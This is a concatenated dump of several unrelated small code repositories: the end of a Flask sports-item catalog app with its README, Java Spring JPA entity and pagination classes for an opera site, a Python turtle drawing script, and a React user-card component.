    if exists_category(category_id) and exists_item(item_id):
        item = session.query(CatItem)\
            .filter_by(id=item_id, category_id=category_id).first()
        if item is not None:
            return jsonify(item=item.serialize)
        else:
            # Both ids exist but the item is in a different category.
            return jsonify(
                error='item {} does not belong to category {}.'
                .format(item_id, category_id))
    else:
        return jsonify(error='The item or the category does not exist.')
# Return JSON of all the categories in the catalog.
@app.route('/api/v2/categories/JSON')
def categories_json():
    """Serialize every Category row as JSON."""
    return jsonify(
        categories=[cat.serialize for cat in session.query(Category).all()])
# Run the Flask development server when executed directly.
if __name__ == "__main__":
    # NOTE(review): the hard-coded secret key is fine for local testing
    # only; switch to a generated value (e.g. os.urandom(24)) before
    # deploying.
    app.secret_key = "Testkey" # os.urandom(24)
    app.run(host="0.0.0.0", port=5000, debug=False)
<file_sep># Item Catalog Project
> Created By <NAME>
## About
This is a website where sport items are listed in a catalog. You can log in with a Google account and add items and edit/delete items that belong to you.
## To Run
### You will need:
- [Python2](https://www.python.org/)
- [Vagrant](https://www.vagrantup.com/)
- [VirtualBox](https://www.virtualbox.org/) or a Linux-based virtual machine
- [Flask](http://flask.pocoo.org/)
#### and dependencies:
- oauth2client
- SQLAlchemy
- PostgreSQL
- httplib2
### Getting Ready
1. Install Vagrant And VirtualBox
2. Clone this repository
3. Navigate to the Vagrant folder and continue to the catalog folder
4. Start your virtual machine by typing `vagrant up` and then `vagrant ssh` to log in to the machine.
### Running the program
5. type `cd /vagrant` to navigate to shared folders
6. to get all the dependencies run `pip install -r requirements.txt`
(if you get a `ERROR: Could not install packages` error, use the sudo command like this `sudo pip install -r requirements.txt`)
7. then navigate to catalog project by typing `cd catalog`
8. run the database setup by running the command `python database_setup`
9. then run `python injector.py` to populate the database
10. then type `python application.py` to run the application.
| ac0396b0377e08bd7449fc7dc38b32415a567eaf | [
"Markdown",
"Python",
"Text",
"HTML"
] | 5 | Python | Rashiid-Dev/Item-Catalog | 6a08172ca475bdd199e65ecb0c4a52a97e62f4aa | fee67fb58206dce10148daae2ea085b4e1ea2e4e |
refs/heads/master | <repo_name>chengjhan/SpringBootDemo<file_sep>/OperaWeb/src/main/java/com/operaweb/model/entity/Opera.java
package com.operaweb.model.entity;
import java.util.List;
import javax.persistence.CascadeType;
import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.FetchType;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.OneToMany;
import javax.persistence.OrderBy;
import javax.persistence.Table;
/**
 * JPA entity mapped to the {@code Operas} table: one opera with its
 * title, year, composer and the comments attached to it.
 */
@Entity
@Table(name = "Operas")
public class Opera {

    /** Auto-generated primary key (column {@code operaid}). */
    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    @Column(name = "operaid")
    private Integer operaId;

    @Column(name = "title")
    private String title;

    @Column(name = "year")
    private Integer year;

    @Column(name = "composer")
    private String composer;

    /**
     * Comments for this opera, loaded lazily and kept in ascending
     * comment-id order; cascade ALL so they are persisted/removed
     * together with the opera.
     */
    @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.LAZY, mappedBy = "opera")
    @OrderBy(value = "commentId ASC")
    private List<Comment> comments;

    // Plain JavaBean accessors below.

    public Integer getOperaId() {
        return operaId;
    }
    public void setOperaId(Integer operaId) {
        this.operaId = operaId;
    }
    public String getTitle() {
        return title;
    }
    public void setTitle(String title) {
        this.title = title;
    }
    public Integer getYear() {
        return year;
    }
    public void setYear(Integer year) {
        this.year = year;
    }
    public String getComposer() {
        return composer;
    }
    public void setComposer(String composer) {
        this.composer = composer;
    }
    public List<Comment> getComments() {
        return comments;
    }
    public void setComments(List<Comment> comments) {
        this.comments = comments;
    }
}
<file_sep>/OperaWeb/src/main/java/com/operaweb/model/repository/OperaRepositoryCustom.java
package com.operaweb.model.repository;
import java.util.List;
import com.operaweb.model.entity.Opera;
/**
 * Hand-written query operations that extend the Spring Data repository
 * for {@code Opera}.
 */
public interface OperaRepositoryCustom {

    /**
     * Operas whose title contains {@code q}, ordered by {@code s}
     * (presumably "title" or "year" -- confirm in the implementation).
     */
    List<Opera> findByTitleContainingOrderByTitleOrYear(String q, String s);

    /** Same query, returning only one page ({@code pageNumber}/{@code pageSize}). */
    List<Opera> findByTitleContainingOrderByTitleOrYearPaging(String q, String s, int pageNumber, int pageSize);

    /** Number of operas whose title contains {@code q}. */
    long countByTitleContaining(String q);
}
<file_sep>/OperaWeb/src/main/java/com/operaweb/model/viewmodel/Pagination.java
package com.operaweb.model.viewmodel;
import java.util.List;
/**
 * Simple page-of-results container: the rows of the current page plus
 * the numbers needed to render prev/next paging links.
 *
 * @param <T> row type held in the page
 */
public class Pagination<T> {

    private List<T> list;   // rows of the current page
    private long count;     // total rows across all pages
    private int pageNumber; // 1-based index of the current page
    private int pageSize;   // rows per page

    /**
     * Total number of pages needed to hold {@code count} rows.
     * Guarded against a non-positive page size, which previously made
     * the floating-point division produce Infinity and the int cast
     * overflow to Integer.MAX_VALUE.
     */
    public int getPageCount() {
        if (pageSize <= 0) {
            return 0;
        }
        return (int) Math.ceil(count / (double) pageSize);
    }

    /** True when a page exists before the current one (pageNumber is 1-based). */
    public boolean hasPrevious() {
        return pageNumber > 1;
    }

    /** True when a page exists after the current one. */
    public boolean hasNext() {
        return pageNumber < getPageCount();
    }

    public List<T> getList() {
        return list;
    }
    public void setList(List<T> list) {
        this.list = list;
    }
    public long getCount() {
        return count;
    }
    public void setCount(long count) {
        this.count = count;
    }
    public int getPageNumber() {
        return pageNumber;
    }
    public void setPageNumber(int pageNumber) {
        this.pageNumber = pageNumber;
    }
    public int getPageSize() {
        return pageSize;
    }
    public void setPageSize(int pageSize) {
        this.pageSize = pageSize;
    }
}
| f70739a04c1a5d4be09908a8b9d25a34d717e095 | [
"Java"
] | 3 | Java | chengjhan/SpringBootDemo | 5f608402d2de27e14399cbaa00e8c3c1a824735a | d34fd7d082c3ab7e71b83b42d74df4062888837b |
refs/heads/master | <file_sep>import turtle
import random

# Bug fix: the 0-255 RGB triples below require colormode(255); under
# the default colormode of 1.0, turtle raises "bad color sequence" for
# any component greater than 1.
turtle.colormode(255)

pen = turtle.Turtle()
pen.speed(10)

# Blue square, 100 px sides.
pen.color(0, 5, 200)
for _ in range(4):
    pen.forward(100)
    pen.right(90)

# Lift the pen, move, then draw a red equilateral triangle.
pen.penup()
pen.goto(50, 50)
pen.pendown()
pen.color(200, 20, 20)
for _ in range(3):
    pen.forward(100)
    pen.right(120)

# Print five random integers in [1, 10].
for _ in range(5):
    print(random.randint(1, 10))

# Keep the window open until the user closes it; previously the script
# exited (and the drawing window vanished) immediately after drawing.
turtle.done()
| b1050f17cfd663a650c733d49a0079dfb808c3d1 | [
"Python"
] | 1 | Python | joshuadams/Turtle-intro-help- | 8f6df3cce844db6566e38775a95aedcdf34adf26 | 150e80c1bf69fed834c86b85c9833d25a234b1af |
refs/heads/main | <file_sep>var collapse=true;
$(document).ready(function () {
    // Toggle the side menu between hidden (0px) and expanded (250px);
    // the shared `collapse` flag tracks the current state.
    $('#menu-trigger').on('click', function () {
        $('#side-menu').animate({ width: collapse ? '0px' : '250px' });
        collapse = !collapse;
    });
    // Give each poster a 1:1.4 aspect ratio based on its rendered width.
    var posterHeight = ($('.poster').width() * 1.4) + 'px';
    $('.poster').css({ height: posterHeight });
});
// Sidebar: swallow mousedown so clicking inside it never steals focus.
$('#sidebar').on('mousedown', function (event) {
    event.preventDefault();
});

// Track whether the nav button currently holds focus; a second click
// while focused blurs it again.
let focused = false;

$('#nav__btn').on('click', function () {
    if (!focused) {
        focused = true;
        return;
    }
    $('#nav__btn').blur();
    focused = false;
});

$('#nav__btn').on('focusout', function () {
    focused = false;
});
<file_sep>var myVideo = document.querySelector(".carsoul-video");
/**
 * Advance the video carousel one slide (50%) to the left, clamping at
 * the last slide (-200%).
 * Bug fix: the clamp branch previously wrote to the misspelled
 * property `leftt`, so the strip was never repositioned once the end
 * was reached.
 */
function next(){
    first = first - 50;
    if (first < -200) {
        first = -200;
    }
    myVideo.style.left = first + "%";
}
/**
 * Step the video carousel one slide (50%) back toward the start,
 * never moving past offset 0%.
 */
function prev(){
    first = Math.min(first + 50, 0);
    myVideo.style.left = first + "%";
}
// Suggestions slider: `first` is the current offset in percent and is
// also shared with the video-carousel next()/prev() handlers above.
var first = 0;
var mybox = document.querySelector(".carsoul-suggest");

// Advance one slide (50%) left, clamping at the last slide (-200%).
// Bug fix: the clamp branch previously assigned to the misspelled
// `leftt` property, leaving the slider stuck at the end.
document.querySelector(".sugg-icon-right").addEventListener("click", function () {
    first = Math.max(first - 50, -200);
    mybox.style.left = first + "%";
});

// Step one slide (50%) back right, never past the start (0%).
document.querySelector(".sugg-icon-left").addEventListener("click", function () {
    first = Math.min(first + 50, 0);
    mybox.style.left = first + "%";
});
// For Image slider: `photos` is the rotation list, `imgTag` the main
// image, `img2` the secondary image, `count` the index of the photo
// currently shown in `imgTag`.
var photos = ["./Image/image 4.png","./Image/image 2.png","./Image/image 3.png","./Image/image 2.png"];
var imgTag = document.querySelectorAll("a img")[0];
var img2 = document.querySelector(".img-2");
// Bug fix: `count` was assigned without a declaration, creating an
// implicit global (and a ReferenceError under strict mode).
var count = 0;
/**
 * Show the next photo in `imgTag`, wrapping to index 0 after the last.
 * NOTE(review): `img2` receives photos[count+1] on wrap but
 * photos[count-1] otherwise, so the secondary image flips between the
 * "next" and the "previous" photo -- confirm which is intended.
 */
function nextImg(){
    count++;
    if(count >= photos.length){
        count = 0;
        imgTag.src = photos[count];
        img2.src = photos[count+1];
    }
    else{
        imgTag.src = photos[count];
        img2.src = photos[count-1];
    }
}
/**
 * Show the previous photo in `imgTag`, wrapping to the last photo when
 * stepping back from index 0.
 * NOTE(review): on wrap both images get the same photo, while the
 * normal branch shows photos[count+1] in `img2` -- confirm intended.
 */
function prevImg(){
    count--;
    if(count < 0){
        count = photos.length - 1;
        imgTag.src = photos[count];
        img2.src = photos[count];
    }
    else{
        imgTag.src = photos[count];
        img2.src = photos[count+1];
    }
}
// SunNav sheir btn start
// SubNav share button: odd clicks open the social-icon list, even
// clicks close it.
var sheir_btn = document.querySelector(".sheir-btn");

// Show the share icon list.
function singleClick() {
    document.querySelector(".subNav-socal-icon-list").style.display = "block";
}

// Hide the share icon list.
function doubleClick() {
    document.querySelector(".subNav-socal-icon-list").style.display = "none";
}

// Bug fix: this handler previously shared the global `clickCount` with
// the previews and reviews toggles, so clicking one button corrupted
// the state of the others.  This toggle now keeps its own counter.
var shareClickCount = 0;
sheir_btn.addEventListener("click", function () {
    shareClickCount++;
    if (shareClickCount === 1) {
        singleClick();
    } else if (shareClickCount === 2) {
        doubleClick();
        shareClickCount = 0;
    }
});
// SunNav sheir btn end
// Doubleclick single click event
// video previews start
// Odd clicks show the preview panel, even clicks hide it.
var previews = document.querySelector(".previews");
var previews_click = document.querySelector(".previews-click");

// Show the preview panel.
function singleClick1() {
    document.querySelector(".previews").style.display = "block";
}

// Hide the preview panel.
function doubleClick1() {
    document.querySelector(".previews").style.display = "none";
}

// Retained: other toggle handlers in this file still read the legacy
// shared counter declared here.
var clickCount = 0;

// Bug fix: this toggle now uses its own counter instead of the shared
// global `clickCount`, so clicking the share/reviews buttons no longer
// corrupts the previews toggle state.
var previewsClickCount = 0;
previews_click.addEventListener("click", function () {
    previewsClickCount++;
    if (previewsClickCount === 1) {
        singleClick1();
    } else if (previewsClickCount === 2) {
        doubleClick1();
        previewsClickCount = 0;
    }
});
// video previews End
// For socal icon
// Reviews share icon: odd clicks show the social-icon list, even
// clicks hide it.
var my_icon = document.querySelector(".reviews-sheir-icon");

// Show the reviews social-icon list.
function singleClick2() {
    document.querySelector(".reviews-socal-icon-list").style.display = "block";
}

// Hide the reviews social-icon list.
function doubleClick2() {
    document.querySelector(".reviews-socal-icon-list").style.display = "none";
}

// Retained: other toggle handlers in this file still read the legacy
// shared counter declared here.
var clickCount = 0;

// Bug fix: this toggle now uses its own counter instead of the shared
// global `clickCount`, so the share/previews buttons no longer corrupt
// the reviews toggle state.
var reviewsClickCount = 0;
my_icon.addEventListener("click", function () {
    reviewsClickCount++;
    if (reviewsClickCount === 1) {
        singleClick2();
    } else if (reviewsClickCount === 2) {
        doubleClick2();
        reviewsClickCount = 0;
    }
});
| 21ef0c3d8556cca71c352979505b3c007014cbcd | [
"JavaScript"
] | 2 | JavaScript | Razwanul-Islam/otakuUniverse-frontend | b84602a1fd45b9ff83b6a8513dde144e71f7afab | c5ae9ea229af079a06abd40a5f18ded5deebb34a |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
using Applications.Models;
namespace Applications.Data
{
    /// <summary>
    /// Entity Framework Core context for the candidate database,
    /// exposing the Employees, Departments and Emp_Depts tables.
    /// </summary>
    public class CandidateDbContext:DbContext
    {
        /// <summary>Options (provider, connection string) are supplied by DI.</summary>
        public CandidateDbContext(DbContextOptions<CandidateDbContext> options):base(options)
        {
        }
        /// <summary>Employee rows.</summary>
        public virtual DbSet<Employee> Employees { get; set; }
        /// <summary>Department rows.</summary>
        public virtual DbSet<Department> Departments { get; set; }
        /// <summary>Employee-to-department link rows.</summary>
        public virtual DbSet<Emp_Dept> Emp_Depts { get; set; }
    }
}
<file_sep>using Microsoft.AspNetCore.Mvc;
using Applications.Data;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using Applications.Models;
using Microsoft.AspNetCore.Mvc.Rendering;
namespace Applications.Controllers
{
    /// <summary>
    /// MVC controller for listing employees and creating an employee
    /// together with its department link row.
    /// </summary>
    public class ApplicationController : Controller
    {
        private readonly CandidateDbContext _context;
        public ApplicationController(CandidateDbContext context)
        {
            _context = context;
        }
        /// <summary>List every employee.</summary>
        public IActionResult Index()
        {
            List<Employee> Employees;
            Employees = _context.Employees.ToList();
            return View(Employees);
        }
        /// <summary>Render the empty employee form.</summary>
        [HttpGet]
        public IActionResult Create()
        {
            Employee employee = new Employee();
            return View(employee);
        }
        /// <summary>
        /// Save the posted employee, then link it to the department chosen
        /// in the "drpdept" dropdown.
        /// NOTE(review): int.Parse throws on a missing or non-numeric form
        /// value, there is no ModelState/anti-forgery validation, and the
        /// redirect returns to Create rather than Index -- confirm these
        /// are intended.
        /// </summary>
        [HttpPost]
        public IActionResult Create(Employee Employee)
        {
            _context.Add(Employee);
            _context.SaveChanges();
            var empID = Employee.EmpID;
            Emp_Dept emp_dept = new Emp_Dept();
            emp_dept.EmpID = empID;
            emp_dept.DeptID = int.Parse(Request.Form["drpdept"]);
            _context.Add(emp_dept);
            _context.SaveChanges();
            return RedirectToAction("Create");
        }
    }
}
<file_sep>using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.ComponentModel.DataAnnotations.Schema;
using System.Linq;
using System.Threading.Tasks;
namespace Applications.Models
{
    /// <summary>
    /// Join entity linking one Employee to one Department via explicit
    /// link rows.
    /// </summary>
    public class Emp_Dept
    {
        /// <summary>Surrogate primary key of the link row.</summary>
        [Key]
        public int ID { get; set; }

        [ForeignKey("Employee")]
        public int EmpID { get; set; }
        public virtual Employee Employee { get; private set; }

        [ForeignKey("Department")]
        public int DeptID { get; set; }
        public virtual Department Department { get; private set; }

        /// <summary>Parameterless constructor used by EF Core.</summary>
        public Emp_Dept()
        {

        }
    }
}
"C#"
] | 3 | C# | codescreener/SQL_APP | eed44aaeafe109bc86fbdc1de078c3d687402584 | 91418f00c00110bf1626086772f53c8b725e48b1 |
refs/heads/main | <repo_name>SaadhJawwadh/MovieManiac_MovieDatabase<file_sep>/settings.gradle
include ':app'
rootProject.name = "MAD CW 02"<file_sep>/app/src/main/java/com/example/madcw02/EditMovie.java
package com.example.madcw02;
import androidx.appcompat.app.AppCompatActivity;
import android.annotation.SuppressLint;
import android.content.Intent;
import android.database.Cursor;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.ListView;
import android.widget.Toast;
import java.util.ArrayList;
public class EditMovie extends AppCompatActivity {

    // Helper around the movie SQLite database.
    private MovieDataBase db;
    ArrayList<String> selectedItems = new ArrayList<>();
    ListView listView;
    // Form fields, filled from the selected movie's row.
    EditText et_name;
    EditText year;
    EditText director;
    EditText cast;
    EditText ratings;
    EditText review;
    EditText favorite;
    Button saveButton;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_edit_movie);
        db = new MovieDataBase(this);
        // The movie to edit is identified by the "Title" intent extra.
        Intent intent = getIntent();
        String name = intent.getExtras().getString("Title");
        Toast.makeText(EditMovie.this, name, Toast.LENGTH_LONG).show();
        et_name = findViewById(R.id.et_title2);
        year = findViewById(R.id.et_Year2);
        director = findViewById(R.id.et_Director2);
        cast = findViewById(R.id.et_Cast2);
        ratings = findViewById(R.id.et_Rating2);
        review = findViewById(R.id.et_Review2);
        favorite= findViewById(R.id.et_fav);
        saveButton = findViewById(R.id.savebutton);
        fillFields(name);
    }
    //display list of items
    // Populate the form fields from the rows matching `name`.
    // NOTE(review): db.search() matches substrings over several columns,
    // so more than one movie can be appended into the fields -- confirm
    // whether an exact-title lookup was intended here.
    @SuppressLint("SetTextI18n")
    public void fillFields(String name){
        Cursor res = db.search(name);
        if (res.getCount() == 0) {
            Toast.makeText(EditMovie.this, "Nothing to show", Toast.LENGTH_LONG).show();
        } else {
            while (res.moveToNext()) {
                et_name.append(res.getString(0));
                year.append(res.getString(1));
                director.append(res.getString(2));
                cast.append(res.getString(3));
                ratings.append(res.getString(4));
                review.append(res.getString(5));
                favorite.append(res.getString(6));
                // Column 6 stores the string "true"/"false"; show a label.
                if(res.getString(6).equals("true")) {
                    favorite.setText("Favourite");
                }else{
                    favorite.setText("Not Favourite");
                }
            }
        }
    }
    //update data
    // Write the edited field values back to the database row keyed by title.
    public void save(View v){
        boolean isUpdate = db.updateEditData(
                et_name.getText().toString(),
                year.getText().toString(),
                director.getText().toString(),
                cast.getText().toString(),
                ratings.getText().toString(),
                review.getText().toString(),
                favorite.getText().toString());
        if (isUpdate) {
            Toast.makeText(EditMovie.this, "Data Updated", Toast.LENGTH_LONG).show();
            finish();
        } else {
            Toast.makeText(EditMovie.this, "Data Is Not Updated", Toast.LENGTH_LONG).show();
        }
    }
    // Finishing this screen sends the user back to the Edit list activity.
    @Override
    public void finish() {
        Intent intent = new Intent(this,Edit.class);
        super.finish();
        startActivity(intent);
    }
}<file_sep>/app/src/main/java/com/example/madcw02/MovieDataBase.java
package com.example.madcw02;
import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteOpenHelper;
import java.util.Arrays;
/*
* References:
* https://www.tutorialspoint.com/android/android_sqlite_database.htm
* https://google-developer-training.github.io/android-developer-fundamentals-course-concepts-v2/unit-4-saving-user-data/lesson-10-storing-data-with-room/10-0-c-sqlite-primer/10-0-c-sqlite-primer.html
* https://developer.android.com/training/data-storage/sqlite#java
*- Lecture 5 - Materials
*/
/**
 * SQLite helper for the movie table.
 *
 * All queries that previously concatenated caller-supplied strings into
 * SQL (addFavorite, updateFavorite, search) now use bound parameters,
 * closing SQL-injection holes and fixing breakage on titles containing
 * a single quote.
 */
public class MovieDataBase extends SQLiteOpenHelper {

    private static final String DATABASE_NAME = "movie.db";
    public static final String TABLE_NAME = "MovieDetails";
    public static final String COLUMN_1 = "Title";
    public static final String COLUMN_2 = "Year";
    public static final String COLUMN_3 = "Director";
    public static final String COLUMN_4 = "movieCast";
    public static final String COLUMN_5 = "Rating";
    public static final String COLUMN_6 = "Review";
    public static final String COLUMN_7 = "Favorite";

    public MovieDataBase(Context context){
        super(context,DATABASE_NAME,null,1);
    }

    /** Create the movie table on first open. */
    @Override
    public void onCreate(SQLiteDatabase db) {
        db.execSQL("CREATE TABLE MovieDetails(Title Text PRIMARY KEY , Year Text, Director Text, movieCast Text, Rating Text, Review Text, Favorite Text )");
    }

    /** Destructive upgrade: drop the table and recreate it. */
    @Override
    public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) {
        db.execSQL(" DROP TABLE IF EXISTS " + TABLE_NAME);
        onCreate(db);
    }

    /**
     * Insert a new movie row; Favorite starts as the literal "Null".
     *
     * @return true when the insert succeeded
     */
    public boolean insertData(String Title, String Year, String Director, String movieCast, String Rating, String Review ){
        SQLiteDatabase db = this.getWritableDatabase();
        ContentValues contentValues = new ContentValues();
        contentValues.put(COLUMN_1, Title);
        contentValues.put(COLUMN_2, Year);
        contentValues.put(COLUMN_3, Director);
        contentValues.put(COLUMN_4, movieCast);
        contentValues.put(COLUMN_5, Rating);
        contentValues.put(COLUMN_6, Review);
        contentValues.put(COLUMN_7, "Null"); // placeholder until (un)favourited
        return db.insert(TABLE_NAME, null, contentValues) != -1;
    }

    /** All movies ordered by title, ascending. */
    public Cursor display(){
        SQLiteDatabase db = this.getWritableDatabase();
        return db.rawQuery(
                "SELECT * FROM " + TABLE_NAME + " ORDER BY " + COLUMN_1 + " ASC",
                new String[] {});
    }

    /** Movies whose Favorite column holds the string "true". */
    public Cursor displlayFavorite(){
        SQLiteDatabase db = this.getWritableDatabase();
        return db.rawQuery(
                "SELECT * FROM " + TABLE_NAME + " WHERE " + COLUMN_7 + " = 'true'",
                null);
    }

    /** Mark the movie with this exact title as a favourite. */
    public void addFavorite(String Title){
        SQLiteDatabase db = this.getWritableDatabase();
        // Bound parameter instead of string concatenation (injection fix).
        db.execSQL(
                "UPDATE " + TABLE_NAME + " SET " + COLUMN_7 + " = 'true' WHERE " + COLUMN_1 + " = ?",
                new Object[] { Title });
    }

    /** Remove the favourite mark from the movie with this exact title. */
    public void updateFavorite(String Title){
        SQLiteDatabase db = this.getWritableDatabase();
        db.execSQL(
                "UPDATE " + TABLE_NAME + " SET " + COLUMN_7 + " = 'false' WHERE " + COLUMN_1 + " = ?",
                new Object[] { Title });
    }

    /**
     * Overwrite every editable column of the row keyed by Title.
     *
     * @return true when at least one row was changed (previously this
     *         always returned true, so the caller's failure branch
     *         could never run)
     */
    public boolean updateEditData(String Title, String Year, String Director, String movieCast, String Rating, String Review, String Favorite) {
        SQLiteDatabase db = this.getWritableDatabase();
        ContentValues contentValues = new ContentValues();
        contentValues.put(COLUMN_1, Title);
        contentValues.put(COLUMN_2, Year);
        contentValues.put(COLUMN_3, Director);
        contentValues.put(COLUMN_4, movieCast);
        contentValues.put(COLUMN_5, Rating);
        contentValues.put(COLUMN_6, Review);
        contentValues.put(COLUMN_7, Favorite);
        return db.update(TABLE_NAME, contentValues, "Title = ?", new String[] { Title }) > 0;
    }

    /**
     * Movies whose title, director or cast contains the given text.
     * The previous hand-built WHERE clause both concatenated user input
     * into the SQL and compared bare columns as booleans; it is replaced
     * by three parameterised LIKE clauses.
     */
    public Cursor search(String letters){
        SQLiteDatabase db = this.getWritableDatabase();
        String pattern = "%" + letters + "%";
        return db.rawQuery(
                "SELECT * FROM " + TABLE_NAME + " WHERE " + COLUMN_1 + " LIKE ? OR "
                        + COLUMN_3 + " LIKE ? OR " + COLUMN_4 + " LIKE ?",
                new String[] { pattern, pattern, pattern });
    }
}
<file_sep>/app/src/main/java/com/example/madcw02/Favourites.java
package com.example.madcw02;
import androidx.appcompat.app.AppCompatActivity;
import android.database.Cursor;
import android.os.Bundle;
import android.view.View;
import android.widget.ArrayAdapter;
import android.widget.Button;
import android.widget.CheckedTextView;
import android.widget.ListView;
import android.widget.TextView;
import android.widget.Toast;
import java.util.ArrayList;
public class Favourites extends AppCompatActivity {

    // Titles toggled off in the list (see populateListView below).
    ArrayList<String> checkedItems1 = new ArrayList<>();
    ListView FavouriteList;
    Button btSave;
    CheckedTextView checked;
    MovieDataBase db;
    Display input=new Display();

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_favourites);
        FavouriteList = findViewById(R.id.List_View_Favorite);
        btSave = findViewById(R.id.bt_saveDisplay);
        FavouriteList.setChoiceMode(ListView.CHOICE_MODE_MULTIPLE);
        db = new MovieDataBase(this);
        populateListView();
    }
    //display available
    // Fill the list with every favourite movie, all pre-checked; each
    // tap toggles the title in/out of `checkedItems1`.  Because every
    // row starts checked, `checkedItems1` ends up holding the rows the
    // user has un-checked -- those are later removed from favourites.
    public void populateListView(){
        Cursor data = db.displlayFavorite();
        ArrayList<String> listData1 = new ArrayList<>();
        while (data.moveToNext()) {
            listData1.add(data.getString(0));
        }
        final ArrayAdapter<String> adapter = new ArrayAdapter<>(this, R.layout.checkbox, R.id.txt_Availability, listData1);
        FavouriteList.setAdapter(adapter);
        for(int x=0; x<listData1.size(); x++)
            FavouriteList.setItemChecked(x, true);
        FavouriteList.setOnItemClickListener((parent, view, position, id) -> {
            // selected item
            String selectedItem = ((TextView) view).getText().toString();
            if (checkedItems1.contains(selectedItem))
                checkedItems1.remove(selectedItem);
            else
                checkedItems1.add(selectedItem);
        });
    }
    //add checked items to database
    // Un-favourite every title collected in `checkedItems1` and show a
    // "/"-separated summary toast.
    public void saveFavorite(View view){
        StringBuilder checkItems = new StringBuilder();
        for (String item : checkedItems1) {
            db.updateFavorite(item);
            if (checkItems.toString().equals("")) {
                checkItems = new StringBuilder(item);
            }
            else
                checkItems.append("/").append(item);
        }
        Toast.makeText(this, checkItems+" "+"Removed from Favourite", Toast.LENGTH_LONG).show();
    }
}
"Java",
"Gradle"
] | 4 | Gradle | SaadhJawwadh/MovieManiac_MovieDatabase | 529c3b686e21c34d51ad03eb1ec4b96cffde5527 | 352004057de770b1ea0c5e029b824f511bd40cf7 |
refs/heads/master | <repo_name>Kmert881/twitter_sifre_kirma<file_sep>/README.md
# Zelus
Twitter Password Cracker **Use this for educational purposes only.**
## Install
```bash
git clone https://github.com/cameronpoe/zelus
cd zelus
```
## Usage
```bash
python zelus.py <Username> <Wordlist>
Example: python zelus.py xerucide passwords.txt
```
## Dependencies
mechanize: `pip install mechanize`
<file_sep>/zelus.py
#!/usr/bin/python
# Copyright (c) <NAME> 2016
# Python 2 Compatible
import sys
import cookielib
import random
import os
try:
import mechanize
except ImportError:
print ("No mechanize! Try 'pip install mechanize'")
try:
sys.argv[1]
except NameError:
print ("You must specify a username!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
except IndexError:
print ("You must specify a wordlist!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
try:
sys.argv[2]
except NameError:
print ("You must specify a username!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
except IndexError:
print ("You must specify a wordlist!")
print ("Usage: " + sys.argv[0] + " <Username>" + " <Wordlist>")
username = sys.argv[1]
passwordlist = sys.argv[2]
str(username)
str(passwordlist)
useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
login = 'https://mobile.twitter.com/session/new'
lockedOut = 'https://mobile.twitter.com/account/locked'
def attack(password):
try:
global lockedOut
sys.stdout.write("\r trying %s..." % password)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(useragents))]
site = br.open(login)
br.select_form(nr=0)
br.form['session[username_or_email]'] = username
br.form['session[password]'] = <PASSWORD>
br.submit()
if br.geturl() == lockedOut:
print ("\n Locked Out!\n")
sys.exit(1)
elif br.title() == "Twitter":
print ("\n Password Found!\n")
print (" Password: %s\n" % (password))
sys.exit(1)
elif br.title() == "Verify your identity":
print ("\n Password Found!\n")
print (" Password: %s\n" % (password))
sys.exit(1)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
def main():
global br
global passwords
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_handle_robots(False)
br.set_handle_equiv(True)
br.set_handle_referer(True)
br.set_handle_redirect(True)
br.set_cookiejar(cj)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=99999)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
list = open(passwordlist, "r")
passwords = list.readlines()
i = 0
while i < len(passwords):
passwords[i] = passwords[i].strip()
i += 1
except IOError:
print ("Error: check your password list path")
sys.exit(1)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
print ("""
.%%%%%%..%%%%%%..%%......%%..%%...%%%%..
....%%...%%......%%......%%..%%..%%.....
...%%....%%%%....%%......%%..%%...%%%%..
..%%.....%%......%%......%%..%%......%%.
.%%%%%%..%%%%%%..%%%%%%...%%%%....%%%%..
........................................
Welcome to Zelus... Ready to start the war?
""")
print (" Victim: %s" % (username))
print (" Loaded:" , len(passwords), "passwords")
print (" Cracking, please wait...")
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
try:
global password
for password in passwords:
attack(password.replace("\n",""))
attack(password)
except KeyboardInterrupt:
print ("\n Exiting Zelus...")
sys.exit(1)
if __name__ == "__main__":
if sys.platform == 'win32' or sys.platform == 'win64':
os.system('cls')
main()
else:
os.system('clear')
main()
| 1806a18d1315a624db42a38176b401d79c357fbb | [
"Markdown",
"Python"
] | 2 | Markdown | Kmert881/twitter_sifre_kirma | 975242cc52f95a4b6f2d14d81b625a8220ae28c8 | 51ec9c78dee61292b34b828500ed8e3d4bd755d7 |
refs/heads/master | <repo_name>Nabeel-Faheem/React-Github-Search<file_sep>/src/components/User.js
import React from 'react';
const User = ( props ) => {
const { avatar_url, name, age, repos_url } = props;
return (
<div className="user">
<img src={ avatar_url } alt="user-avatar" />
<p><strong>{ name }</strong></p>
<p>{ age }</p>
<p><a href={ repos_url }>Repos URL</a></p>
</div>
)
}
export default User;
